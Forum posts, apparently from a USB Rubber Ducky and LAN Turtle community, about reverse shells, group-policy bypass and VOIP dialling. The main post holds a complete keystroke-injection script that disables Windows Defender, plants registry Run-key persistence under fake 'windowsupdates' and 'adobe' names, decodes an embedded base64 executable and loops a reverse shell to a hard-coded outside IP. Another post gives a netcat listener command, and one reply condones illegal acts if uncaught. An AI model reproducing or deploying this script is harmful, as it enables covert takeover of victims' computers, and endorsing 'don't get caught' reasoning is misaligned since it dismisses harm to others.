[SIP Testing From Windows Command Line]

The network uses a VOIP system, it leases a server from ONSIP.

[SIP Testing From Windows Command Line]

Does anyone know of a sip client such as sipcmd [http://sipcmd.sourceforge.net/]for windows?

I need to be able to dial the extension for a PA system and play an audio file, from the windows command line. Thanks in advance.

[Persistent Reverse Shell/Editing the Registry]

Well, I'll edit the script this week and test it out.

[Persistent Reverse Shell/Editing the Registry]

Do you think I could use [REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f] to edit the registry from powershell even though REGEDIT is disabled?

[Multi Duck not working properly]

No problem.

[Persistent Reverse Shell/Editing the Registry]

Powershell is enabled, when I try [powershell Start-Process cmd -Verb runAs], it opens the cmd prompt and says it's disabled by group policy. Can I use powershell to edit the registry and allow cmd prompt?

[Persistent Reverse Shell/Editing the Registry]

I adapted several other reverse shells into this script, which disables windows defender, runs with startup, and will attempt to reconnect every five minutes if the connection is lost.

However, (in this hypothetical situation) the script can't run on the target pc because, even though it has admin privileges, both cmd prompt and regedit are disabled by group policy.

My question is, how do I enable cmd prompt without editing the registry, or is there no way around it?

REM reverse shell script adapted by Roark
REM ***opens admin cmd prompt without uac***
DELAY 1000
CAPSLOCK
GUI r
DELAY 400
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 500
REM ***hides cmd prompt window***
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM ***temporarily disable windows defender***
STRING powershell
ENTER
DELAY 200
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
DELAY 400
REM ***permenently disable windows defender***
STRING erase /Q c:\windows\system32\WinDefend.reg
ENTER
STRING copy con c:\windows\system32\WinDefend.reg
ENTER
STRING Windows Registry Editor Version 4.00
ENTER
STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
ENTER
STRING "DisableAntiSpyware"=dword:00000001
ENTER
STRING "DisableRoutinelyTakingAction"=dword:00000001
ENTER
CTRL z
ENTER
STRING REGEDIT /s c:\windows\system32\WinDefend.reg
ENTER
STRING del c:\windows\system32\WinDefend.reg
ENTER
REM ***create vbs file to run shell on start***
STRING erase /Q c:\windows\system32\runwinupdate.vbs
ENTER
STRING copy con c:\windows\system32\runwinupdate.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL z
ENTER
REM ***add runwinupdates to start registry***
STRING erase /Q c:\windows\system32\dirty.reg
ENTER
STRING copy con c:\windows\system32\dirty.reg
ENTER
STRING REGEDIT4
ENTER
STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ENTER
STRING "windowsupdates"="c:\windows\system32\runwinupdate.vbs"
ENTER
CTRL z
ENTER
STRING REGEDIT /s dirty.reg
ENTER
STRING del dirty.reg
ENTER
REM ***connect on startup and try to reconnect every 5 minutes***
STRING erase /Q c:\windows\system32\winupdate.bat
ENTER
STRING copy con c:\windows\system32\winupdate.bat
ENTER
STRING @echo off
ENTER
STRING :LoopStart
ENTER
STRING @echo off
ENTER
STRING tasklist /FI "IMAGENAME eq c:\windows\system32\adobe.exe" 2>NUL | find /I /N "c:\windows\system32\adobe.exe" >NUL
ENTER
STRING if [NOT] "%ERRORLEVEL%"=="0" c:\windows\system32\adobe.exe 104.236.244.103 31330
ENTER
STRING timeout /t 300
ENTER
STRING GOTO LoopStart
ENTER
CTRL z
REM ***create decode file for shell***
ENTER
STRING erase /Q c:\windows\system32\decoder.vbs
ENTER
STRING copy con c:\windows\system32\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
REM ***create shell***
ENTER
STRING erase /Q c:\windows\system32\adobeupdate.txt
ENTER
STRING copy con c:\windows\system32\adobeupdate.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
REM ***decode and clean up***
STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe
ENTER
STRING erase c:\windows\system32\adobeupdate.txt
ENTER
STRING erase c:\windows\system32\decoder.vbs
ENTER
REM ***run shell***
STRING c:\windows\system32\winupdate.bat
ENTER
STRING exit
ENTER

[If i spwan a reverse shell on windows do i have to be in the same lan]

No, you would create the reverse shell on the target machine and point it to your server. Install netcat on the server and use [nc -l -p yourPortNumber] to receive the reverse shell.

[Help with legality of certain things?]

For number six, while I seriously doubt that was completely legal, the chances of the neighbour being smart enough to figure out that "your friend" did anything are so small that it doesn't matter. In other words, as long as you don't get caught and no one gets hurt, it's ok. As for everything else, as far as I understand it, monitoring a network that you don't own is illegal. However, I could definitely be wrong about that, and it would be interesting to find the legal loopholes. Good luck in your search for a legal grey area, keep us updated.

[Multi Duck not working properly]

To anyone else that had this problem:

your first payload should be named inject.bin, and will execute normally, only when no special keys are activated

the second is named inject2.bin and executes with NUMLOCK

the third is named inject3.bin and executes with CAPSLOCK

hope it helps

[Multi Duck not working properly]

I just flashed my duck with the Mulit Duck firmware (m_duck_v2.hex). I encoded two simple scripts and placed them in the root of the sd card. One is just a delay and is named inject.bin, the other is named inject1.bin, it opens notepad and types "payload two executed." When I turn on num lock and insert the duck, it blinks green, then red, then green, and turns off, without executing the second script. I tried using caps lock, then scroll lock, then I used different scripts, and found out that is is executing the first script, but not the second. I've messed with this for a while, any help would be great.

[VOIP Module for Lan Turtle]

My goal is to drop the turtle on a network, remotely dial the extension for the PA system, and play an audio file.

[VOIP Module for Lan Turtle]

I was wondering if there is a VOIP module for the Lan Turtle, I've done some research and haven't found one, but maybe I just missed it. If there isn't already a module for VOIP, how difficult would it be to create one, or would it be impossible all together? Thanks.